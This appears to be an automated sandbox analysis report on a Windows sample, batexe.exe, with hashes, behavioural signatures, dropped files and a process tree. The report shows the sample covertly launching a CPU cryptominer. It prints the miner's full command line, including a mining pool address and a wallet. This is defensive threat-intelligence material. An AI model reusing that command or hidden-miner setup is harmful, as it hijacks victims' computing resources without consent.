Analysis

  • max time kernel
    296s
  • max time network
    304s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    21-02-2024 23:41

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Users\Admin\AppData\Local\Temp\1BE0.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\1BE0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1BE0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4172
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2229.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3736
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3372

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1BE0.tmp\b2e.exe

    Filesize

    3.1MB

    MD5

    96120993939f45494a2291ac005fc474

    SHA1

    a3cbe6f79529aebfeeb7adf91dd6b9af72029334

    SHA256

    238062b41bcb8369b3812623b0835fea1db60ed979c076477c0f9e4f50fbc838

    SHA512

    04e8b936a4401d1f0fa77d89c125aac6d30e3d56142eb91ff8f4e89f12e5c5b27b619ba4c67996833ecb4571fdd4bef315279951a67b823f64c67ec71f121615

  • C:\Users\Admin\AppData\Local\Temp\1BE0.tmp\b2e.exe

    Filesize

    3.0MB

    MD5

    42e52d2aa6e0aa4e0a6cb435f3e72e32

    SHA1

    904d518be9644114eda76add80ccf585ee238731

    SHA256

    4f8c614822cb12e7405d484d8ef1c5796fe1002f4e20867e761623d6108bd5ed

    SHA512

    c5bdbe9278322b817f6744ed51e93d2a5a32b7285a5d8506bd7d6578fd432f43caec54c5ae81074a06b8c2b4a36ad5ee4bb6e817698252ec8df1406ee68916e4

  • C:\Users\Admin\AppData\Local\Temp\2229.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.8MB

    MD5

    4260fb9c30bad60b2e475881799692a1

    SHA1

    c56dd011a4548220303790bc0d5141f1a1a040a4

    SHA256

    ca40545b0aa74ecb53f6f52cb70fe1aab492f4d0a8d4d632ecef01fa74ddab0a

    SHA512

    3adc8a421543c7178106db93786b274a2f7f11ffdfe57b54676116c67727ceeb160374ed086c065fb35e4e2f0548860c30d9d79aedf4c52f0680f751332d3702

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    947KB

    MD5

    abf5688c65fce004199e7e2e81f6b0a8

    SHA1

    454788a5f5491934ecf510e3ddc0a5fb0fcc5ccc

    SHA256

    3101d48fb058cb70ea806baca80cc74044e8f808d460b3e2a5fe1b3bd9f173a8

    SHA512

    6c5f0a6e654d7100a562d111b00c1f77256aa0dbb4481e9507e823e91aca812353b443336d8357c8a8f181101d10682a27fc4cc3dbaf0c23a2032a8a68485582

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    667KB

    MD5

    00b7f96a4abd6b28fef9868b4b5c6b6d

    SHA1

    6a7f15e35babbf56cabc367e97f6807a65aad3eb

    SHA256

    8b32e079d32b079af3f0c54faa96b2cb3cf882de5039d50fe63a57ac4f664d3a

    SHA512

    bd74e2760eebf004ebde9e1a9f750ac2fe7db0f271bd611f19de6638e21e9f1679a3d7ad03911b7e3a1922b1a02b2f1a526fa70b7a83c4a2f14c68ef7ff0d0f6

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    901KB

    MD5

    3b0f0e08b3e76f5aca073d8d13dea538

    SHA1

    700c5379ec9cbd121aaa8aa163991568d620e943

    SHA256

    93eed3825deeccb6bb2ea9b2250d6adb3115fad059f21380e46315c78f9cec9b

    SHA512

    a91e3c23c4c35616325e300d251ba0693fd446af5f075bb6e5d6de87aa1bdeeb9770ba79ff3675fe295056b599abda38528c3dbe2bc22b35a9fb78010defc612

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    765KB

    MD5

    b185cbe58e66c2487a9559d0bce6de63

    SHA1

    5dc52895fcffca2ea3448b7febf906ef2a22282c

    SHA256

    8fead28b7f9c429f1856c04be37a2dadb731f00acc35d38d4ba0cf693cc4bd94

    SHA512

    029ba8c575f6d08534671db669b51af8608d2735d9731996cd454e8bbddb1c712cb0eb875315bcd2619838b322fcde89d2caee9611a956a56657bc97e3d39a8c

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    604KB

    MD5

    a158055c277449e5c0f631efb4a1b8a4

    SHA1

    5e59082a307236db5401bc0cfc77ba40c8289f26

    SHA256

    806e32c22d63c72d032d827d19c54a0dab581247b6941ef07f1be0d6d4c8f4c2

    SHA512

    b68c6d0b5af4880514bf835ad006fb09f2c14b905589346f878558ec7b82b71505a77d5917d6aef490be6efebaeaa88b91922d68e2575e954dc3e592e0898ab4

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    574KB

    MD5

    d92c9eba32cf763e2e4fbe2d9a869c1e

    SHA1

    7066bb3d41feb3b0c8ed240e18e5734c337aed71

    SHA256

    5a8097563f95526b1dffdb1af7e54c3d11a106b5f9ddcf88518f043fe809ffcd

    SHA512

    868ed6c5aee149a71853091a88e15d407c388c5a6fdf7f63e71b163afe36ce66cfd377bc06708ea1d7a7ceec10c77f5bc33915bf00304872b405690fe89d4c06

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    933KB

    MD5

    af79257ad76016649dbcd3ee6036768a

    SHA1

    b5a8df6d6efb634a79dc3b303c5cc6170e374632

    SHA256

    1518ba4595aff2e9369cdb856ae89b3f8bf95fddf511c8d583d8bf9718498ad0

    SHA512

    a759deaf052edabfc9d694e6cbf708e51654870dd92f9735b9e3b4a770d193e0a2ec784821391c09c5cad82f2afc1b93f98ba599a5cecd8d317d8fdfd3bd3228

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    908KB

    MD5

    22d0ac78e848e29be1b4747e8954608c

    SHA1

    9ee4a7f725ede34ca3f420a32d2070041f91bab7

    SHA256

    5de928f10a9e5a00753e839a3c5cb7245ad9bf547a064db8f23791adbf32f20e

    SHA512

    93bcb79c184b5d4646f150af3a06b85eebfac6c25ac716ed44e8b9cf82158c40f38af8824b545ee94087f5e5c1d4b0bfa847be14569710a717e4256f88b84927

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/788-5-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3372-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3372-42-0x000000006E300000-0x000000006E398000-memory.dmp

    Filesize

    608KB

  • memory/3372-43-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3372-44-0x0000000001100000-0x00000000029B5000-memory.dmp

    Filesize

    24.7MB

  • memory/3372-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3372-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4172-6-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4172-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB